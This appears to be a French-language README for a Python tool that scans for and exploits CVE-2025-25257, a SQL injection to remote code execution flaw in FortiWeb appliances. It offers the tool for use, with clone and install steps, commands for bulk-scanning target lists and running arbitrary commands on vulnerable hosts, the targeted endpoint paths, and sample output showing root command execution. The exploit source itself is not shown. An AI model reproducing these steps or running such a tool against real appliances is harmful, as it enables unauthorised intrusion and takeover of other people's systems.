
Un outil basé sur Python pour vérifier et exploiter la vulnérabilité CVE-2025-25257 dans les appareils FortiWeb. Cette vulnérabilité permet l'injection SQL et l'exécution de code à distance via un en-tête Authorization spécialement conçu.
CVE-2025-25257 est une vulnérabilité critique dans les appareils FortiWeb qui permet :
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Vérifier une seule cible :
python3 vuln_check.py -t https://target.com
Vérifier plusieurs cibles à partir d'un fichier :
python3 vuln_check.py -l target.txt
exp.py)Exécuter des commandes sur une cible vulnérable :
python3 exp.py -t https://target.com -c "id"
vuln_check.py - Vérificateur et exploit de vulnérabilité principalexp.py - Outil d'exécution de commandes pour les cibles vulnérablestarget.txt - Exemple de liste de cibles (remplacez-la par la vôtre)vuln.txt - Fichier de sortie contenant les cibles vulnérables (généré après l'analyse)/api/fabric/device/status/cgi-bin/x.cgiL'outil génère un fichier vuln.txt contenant :
Exemple de sortie :
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
crédit:0xbigshaq